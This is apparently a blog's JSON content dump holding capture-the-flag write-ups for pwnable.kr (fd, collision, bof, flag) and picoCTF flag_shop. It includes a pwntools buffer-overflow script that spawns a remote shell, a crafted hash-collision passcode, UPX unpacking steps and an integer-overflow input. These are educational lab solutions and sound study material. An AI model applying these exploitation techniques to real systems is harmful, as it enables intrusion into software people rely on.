Next, the program reads up to 32 bytes from fd into the buffer buf. If the content of buf is equal to LETMEWIN\\n, the program will print the flag.\nIn Unix operating systems, the standard file descriptors are 0, 1, and 2 for stdin, stdout, and stderr respectively.\nIf we manage to set the file descriptor to 0 (standard input), we can then type in the LETMEWIN\\n string ourselves. 0x1234 is 4660 in decimal, so passing 4660 sets fd to 0 and causes the read(fd, buf, 32); line to read from standard input. Typing LETMEWIN and pressing Enter then returns the flag: strcmp returns 0 when the two strings are equal, so !strcmp(\u0026quot;LETMEWIN\\n\u0026quot;, buf) is true.\nFlag: mommy! I think I know what a file descriptor is!!\ncollision: Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnable.kr -p2222 (pw:guest) Solution: Once again, there are three files provided: col, col.c, and flag. The source code, col.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i\u0026lt;5; i++){ res += ip[i]; } return res; } int main(int argc, char* argv[]){ if(argc\u0026lt;2){ printf(\u0026#34;usage : %s [passcode]\\n\u0026#34;, argv[0]); return 0; } if(strlen(argv[1]) != 20){ printf(\u0026#34;passcode length should be 20 bytes\\n\u0026#34;); return 0; } if(hashcode == check_password( argv[1] )){ system(\u0026#34;/bin/cat flag\u0026#34;); return 0; } else printf(\u0026#34;wrong passcode.\\n\u0026#34;); return 0; } From the code, we learn that to get the flag, we need to provide a 20-byte passcode such that the check_password function returns the hashcode value 0x21DD09EC.\nProviding 0x21DD09EC or 568134124 (0x21DD09EC in decimal) as the passcode obviously won\u0026rsquo;t work as it is not 20 bytes.
Providing something like 'AAAAABBBBBCCCCCDDDDD' also won\u0026rsquo;t work: although it is 20 bytes long, its bytes do not add up to the required value. Therefore, we need to better understand the check_password function, which is the core of the program:\nunsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i\u0026lt;5; i++){ res += ip[i]; } return res; } The input p is cast to an int*, meaning the function treats the input string p as an array of integers. Each int is 4 bytes, so the function reads 5 integers from the 20-byte string (5 * 4 = 20), sums them, and returns the result. The goal is to craft an input whose 5 integers sum to the target hashcode 0x21DD09EC (568134124 in decimal).\nCalculation: Divide the target hashcode by 5, discarding the remainder:\n568134124 / 5 = 113626824 (remainder 4) Multiply the base integer by 4:\n4 * 113626824 = 454507296 Subtract this from the target to find the fifth integer:\n568134124 - 454507296 = 113626828 The integers are 113626824 repeated four times and 113626828 once \u0026ndash; which we can use to craft the passcode. In hexadecimal these are:\n113626824 -\u0026gt; 0x06c5cec8 113626828 -\u0026gt; 0x06c5cecc These hexadecimal values represent the bytes that need to be packed into the passcode. On x86, integers are stored in little-endian order, so the byte sequences are \\xc8\\xce\\xc5\\x06 and \\xcc\\xce\\xc5\\x06. None of these bytes is zero, so strlen() still sees all 20 bytes.\nYou might be wondering why we divided by 5 and then calculated the fifth integer separately. This is because 568134124 is not divisible by 5: the exact result is 113626824.8, and each of the five integers must be a whole number. 
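The arithmetic above, including the little-endian packing, can be double-checked with a short Python sketch. It emulates check_password by unpacking five 4-byte little-endian integers and keeping only the low 32 bits of the sum. It assumes a 32-bit x86 build, where int and unsigned long are both 4 bytes. This is a verification aid, not the exploit itself.

```python
import struct

TARGET = 0x21DD09EC  # hashcode from col.c

# Four equal parts, with the division remainder folded into the fifth
base, remainder = divmod(TARGET, 5)
last = base + remainder

# Pack each value as a 4-byte little-endian integer, as x86 stores an int
passcode = struct.pack('<I', base) * 4 + struct.pack('<I', last)


def check_password(p):
    # Python analogue of check_password(): read five 4-byte ints and sum them
    ints = struct.unpack('<5i', p)
    return sum(ints) & 0xFFFFFFFF  # keep 32 bits, as the C return value would


print(base, last)                          # 113626824 113626828
print(passcode.hex())                      # c8cec506c8cec506c8cec506c8cec506cccec506
print(check_password(passcode) == TARGET)  # True
print(len(passcode), 0 not in passcode)    # 20 True (no NUL byte to cut strlen short)
```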
Using four equal integers plus one slightly larger integer lets the total match the target hashcode exactly.\nWe can use Python to build the 20-byte passcode:\npython3 -c \u0026#39;import sys; sys.stdout.buffer.write(b\u0026#34;\\xc8\\xce\\xc5\\x06\u0026#34; * 4 + b\u0026#34;\\xcc\\xce\\xc5\\x06\u0026#34;)\u0026#39; Using that output as the argument to col:\nFlag: daddy! I just managed to create a hash collision :)\nbof: Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 Solution: As the name of the challenge suggests, we are going to be exploiting a buffer overflow. The source code of the binary bof, bof.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void func(int key){ char overflowme[32]; printf(\u0026#34;overflow me : \u0026#34;); gets(overflowme);\t// smash me! if(key == 0xcafebabe){ system(\u0026#34;/bin/sh\u0026#34;); } else{ printf(\u0026#34;Nah..\\n\u0026#34;); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } The vulnerability is the call to gets(overflowme): gets does not perform bounds checking, so if we input more than 32 characters, it will overflow the overflowme buffer and overwrite adjacent memory. From the code we can see that if the value of key is 0xcafebabe, the program calls system(\u0026quot;/bin/sh\u0026quot;) to open a shell.\nWe start by using gdb to disassemble the program:\nWhen func is disassembled, we can see that key is compared against 0xcafebabe at the cmp instruction, so we set a breakpoint there using break *func+40. 
We then run the program and input a long string of \u0026lsquo;A\u0026rsquo; characters.\nWe inspect the stack by issuing the x/50wx $esp command, which shows 50 words (200 bytes) starting at the stack pointer ($esp).\nIn the output we can see 0xdeadbeef, which is the value we want to overwrite, and our input of \u0026lsquo;A\u0026rsquo;s (0x41 in hex). The offset, i.e. the exact number of \u0026lsquo;A\u0026rsquo;s we need, is the distance from the start of overflowme to key, which we find by counting the bytes between the two in the stack dump. On this run we entered 48 \u0026lsquo;A\u0026rsquo;s, and the dump shows one more 4-byte word between the end of our input and 0xdeadbeef. Therefore, 4 more \u0026lsquo;A\u0026rsquo;s reach the key variable \u0026ndash; so 52 bytes of padding are needed before the bytes that overwrite key.\nWe write a script using pwntools for the exploit:\nfrom pwn import *\npayload = b\u0026#39;A\u0026#39;*52 + p32(0xcafebabe) # 52 \u0026#39;A\u0026#39;s followed by the little-endian representation of 0xcafebabe\nr = remote(\u0026#39;pwnable.kr\u0026#39;, 9000)\nr.sendline(payload)\nr.interactive()\nWe run this and get a shell on the remote machine, which lets us cat out the flag:\nFlag: daddy, I just pwned a buFFer :)\nflag: Papa brought me a packed present! let\u0026#39;s open it. Download : http://pwnable.kr/bin/flag This is reversing task. all you need is binary Solution: For this challenge we are given one file named flag. Attempting to run it returns a Permission denied error because the file is not yet marked as executable. 
We give it execute permission and run it:\nIf we take a look at the binary, we can see that it has no section header:\nI initially tried disassembling the program with gdb, but that went nowhere because there was no symbol table or debugging information.\nI then ran strings on the file, which at first returned garbled output until I came across the following line:\nSo, we learn that the file is packed with the UPX executable packer. A packed executable has its code compressed, with a small stub that decompresses it in memory when the program runs. Packing is also a common obfuscation technique used by malware authors to hide their malicious code and evade detection. As the specific packer for this file is known, we can use UPX itself to unpack it and reveal the actual content of the binary.\nSo, I installed upx and ran upx -d to unpack the file:\nRunning file flag now shows that the file is not stripped:\nWith the binary unpacked, running strings on it returns much more readable output.\nUsing gdb to disassemble the program:\nNotice the comment gdb prints next to the flag\u0026rsquo;s address, # 0x6c2070. The pointer stored at that address is loaded into rdx. We can issue the command x/s *0x6c2070 to dereference the pointer stored at the address and print the string located at the resulting address.\nUsing Ghidra: Alternatively, we could have achieved this using Ghidra. Once the unpacked binary is loaded, going to the main function will present the following:\nWe have the listing window, which shows the disassembled code of the binary, and the decompile window to the right, which translates the assembly into C-like pseudocode. If you take a close look, the listing window already shows the flag, but ignoring that for a second, the decompile window shows the flag variable being defined on line 9. 
When we click it we get:\nThese entries look like a reference to a string; clicking the reference shows the string value, which is the same flag:\nFlag: UPX...? sounds like a delivery service :)\n","permalink":"https://nhantouli.com/posts/pwnable-kr-writeups/","summary":"\u003cp\u003e\u003cem\u003eThis post details my writeups for a few of the challenges at \u003ca href=\"http://pwnable.kr\"\u003epwnable.kr\u003c/a\u003e \u0026ndash; a wargame site for pwn challenges. As I make my way through the other challenges I\u0026rsquo;ll periodically update this page with additional writeups. I may also work through the \u003ca href=\"https://guyinatuxedo.github.io/\"\u003eNightmare\u003c/a\u003e course to get better at binary exploitation/reverse engineering as I\u0026rsquo;ve heard positive feedback about it.\u003c/em\u003e\u003c/p\u003e\n\u003ch1 id=\"fd\"\u003efd:\u003c/h1\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eMommy! what is a file descriptor in Linux?\nssh fd@pwnable.kr -p2222 (pw:guest)\n\u003c/code\u003e\u003c/pre\u003e\u003ch3 id=\"solution\"\u003eSolution:\u003c/h3\u003e\n\u003cp\u003eThere are 3 files provided: the binary \u003ccode\u003efd\u003c/code\u003e, the source code \u003ccode\u003efd.c\u003c/code\u003e and a flag file \u003ccode\u003eflag\u003c/code\u003e.\u003c/p\u003e","title":"pwnable.kr writeups"},{"content":"This is a write-up for the picoCTF challenge “flag_shop”. PicoCTF is a CTF (Capture the Flag) platform created by Carnegie Mellon University, with challenges in six different cyber security domains including web exploitation, reverse engineering, binary exploitation, and more. 
Writeups for this challenge were fragmented and lacked detail, so I took a crack at it to help bring some clarity!\nDescription: Solution: In this challenge we deal with a simple flag store and are provided its source written in C.\nThe service provides three options:\nCheck Account Balance Buy Flags Exit The second option contains 2 flag types: fake flags and a real flag. The real flag costs $100,000, but our starting balance is a mere $1100. How should we proceed? The source code will provide direction.\n1#include \u0026lt;stdio.h\u0026gt; 2#include \u0026lt;stdlib.h\u0026gt; 3int main() 4{ 5 setbuf(stdout, NULL); 6 int con; 7 con = 0; 8 int account_balance = 1100; 9 while(con == 0){ 10 11 printf(\u0026#34;Welcome to the flag exchange\\n\u0026#34;); 12 printf(\u0026#34;We sell flags\\n\u0026#34;); 13 14 printf(\u0026#34;\\n1. Check Account Balance\\n\u0026#34;); 15 printf(\u0026#34;\\n2. Buy Flags\\n\u0026#34;); 16 printf(\u0026#34;\\n3. Exit\\n\u0026#34;); 17 int menu; 18 printf(\u0026#34;\\n Enter a menu selection\\n\u0026#34;); 19 fflush(stdin); 20 scanf(\u0026#34;%d\u0026#34;, \u0026amp;menu); 21 if(menu == 1){ 22 printf(\u0026#34;\\n\\n\\n Balance: %d \\n\\n\\n\u0026#34;, account_balance); 23 } 24 else if(menu == 2){ 25 printf(\u0026#34;Currently for sale\\n\u0026#34;); 26 printf(\u0026#34;1. Defintely not the flag Flag\\n\u0026#34;); 27 printf(\u0026#34;2. 
1337 Flag\\n\u0026#34;); 28 int auction_choice; 29 fflush(stdin); 30 scanf(\u0026#34;%d\u0026#34;, \u0026amp;auction_choice); 31 if(auction_choice == 1){ 32 printf(\u0026#34;These knockoff Flags cost 900 each, enter desired quantity\\n\u0026#34;); 33 34 int number_flags = 0; 35 fflush(stdin); 36 scanf(\u0026#34;%d\u0026#34;, \u0026amp;number_flags); 37 if(number_flags \u0026gt; 0){ 38 int total_cost = 0; 39 total_cost = 900*number_flags; 40 printf(\u0026#34;\\nThe final cost is: %d\\n\u0026#34;, total_cost); 41 if(total_cost \u0026lt;= account_balance){ 42 account_balance = account_balance - total_cost; 43 printf(\u0026#34;\\nYour current balance after transaction: %d\\n\\n\u0026#34;, account_balance); 44 } 45 else{ 46 printf(\u0026#34;Not enough funds to complete purchase\\n\u0026#34;); 47 } 48 49 50 } 51 52 } 53 else if(auction_choice == 2){ 54 printf(\u0026#34;1337 flags cost 100000 dollars, and we only have 1 in stock\\n\u0026#34;); 55 printf(\u0026#34;Enter 1 to buy one\u0026#34;); 56 int bid = 0; 57 fflush(stdin); 58 scanf(\u0026#34;%d\u0026#34;, \u0026amp;bid); 59 60 if(bid == 1){ 61 62 if(account_balance \u0026gt; 100000){ 63 FILE *f = fopen(\u0026#34;flag.txt\u0026#34;, \u0026#34;r\u0026#34;); 64 if(f == NULL){ 65 66 printf(\u0026#34;flag not found: please run this on the server\\n\u0026#34;); 67 exit(0); 68 } 69 char buf[64]; 70 fgets(buf, 63, f); 71 printf(\u0026#34;YOUR FLAG IS: %s\\n\u0026#34;, buf); 72 } 73 74 else{ 75 printf(\u0026#34;\\nNot enough funds for transaction\\n\\n\\n\u0026#34;); 76 }} 77 78 } 79 } 80 else{ 81 con = 1; 82 } 83 84 } 85 return 0; 86} Our goal here is to end up with an account balance greater than $100,000 to buy the real flag.\nWhile analyzing the source, I identified a section on line 39 where the program calculates the total cost of flags to be purchased. 
Because number_flags is a user-supplied integer that is multiplied by 900 to calculate total_cost, this calculation may be vulnerable to an integer overflow.\nIf total_cost can be made negative, it passes the total_cost \u0026lt;= account_balance check on line 41, and line 42 then subtracts a negative amount from our account balance, boosting our funds by the absolute value of total_cost.\nBy definition, an integer overflow occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs [CWE-190].\nnumber_flags and total_cost are both declared as int. In this case, int is a signed 32-bit type.\nNote: the size of int depends on the platform\u0026rsquo;s data model rather than simply on whether a binary is 32- or 64-bit; on common 32- and 64-bit Linux targets int is 32 bits, while types such as long differ. Rather than assuming an integer\u0026rsquo;s size, it is a good idea to verify it: in C, sizeof(int) gives the size in bytes, which is 4 for a 32-bit int.\nOur hint from picoCTF tells us that “Two’s complement can do some weird things when numbers get really big!”. In short, two’s complement is the usual way computers represent signed (negative and positive) integers as fixed-width binary numbers.\nTake a look at this chart that uses a 4-bit representation in two’s complement format to represent the signed integers:\nThe positive integer 1 in binary is 0001. 
To represent -1 using two\u0026rsquo;s complement, you start from 0001, invert the bits to get 1110, and then add 1 to get 1111.\nAs mentioned previously, an integer overflow occurs when an integer value is incremented to a value that is too large to store in the associated representation. A signed 4-bit integer can represent values from -8 to 7, so when you add 1 to 7, the result is -8: the value has “wrapped around” because there are not enough bits to represent 8. As a signed number, 8 needs five bits (01000), since the top bit of a signed value acts as the sign bit. Only the low four bits are kept, leaving 1000, and a quick look at our chart tells us that this is -8.\nThe range of values for a signed 32-bit integer is -(2^31) to 2^31 - 1, or -2,147,483,648 to 2,147,483,647.\nRemember, once we reach the upper limit of what we can represent in two\u0026rsquo;s complement, the very next value wraps around to a negative number. Therefore, to find a value of number_flags that triggers the overflow, we can take the upper limit of 2,147,483,647 and divide by 900, the price per flag. The result is 2386092.94111, so the quantity must be larger than that. Rounding up to 2386100 leaves some margin so that the overflow occurs reliably: right at the boundary, total_cost wraps to a value so close to -2^31 that subtracting it from the balance would overflow a second time.\nWith 2386100 flags, total_cost = 900 * 2386100 = 2,147,490,000, which wraps to -2,147,477,296. The balance becomes 1100 + 2,147,477,296 = 2,147,478,396, well above the 100,000 needed, so we can purchase the flag.\nFlag: picoCTF{m0n3y_bag5_68d16363}\n","permalink":"https://nhantouli.com/posts/flag-shop-writeup/","summary":"\u003cp\u003e\u003cem\u003eThis is a write-up for the \u003ca href=\"https://picoctf.org/\"\u003epicoCTF\u003c/a\u003e challenge “flag_shop”. 
PicoCTF is a CTF (Capture the Flag) platform created by Carnegie Mellon University, with challenges in six different cyber security domains including web exploitation, reverse engineering, binary exploitation, and more. 
Writeups for this challenge were fragmented and lacked detail, so I took a crack at it to help bring some clarity!\u003c/em\u003e\u003c/p\u003e\n\u003ch2 id=\"description\"\u003eDescription:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"Description Image\" loading=\"lazy\" src=\"/images/flag-shop-writeup/flag-shop-desc.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"solution\"\u003eSolution:\u003c/h2\u003e\n\u003cp\u003eIn this challenge we deal with a simple flag store and are provided its \u003ca href=\"https://jupiter.challenges.picoctf.org/static/dd28f0987f28c894f35d5d48564c3402/store.c\"\u003esource\u003c/a\u003e written in C.\u003c/p\u003e","title":"picoCTF flag_shop writeup"}]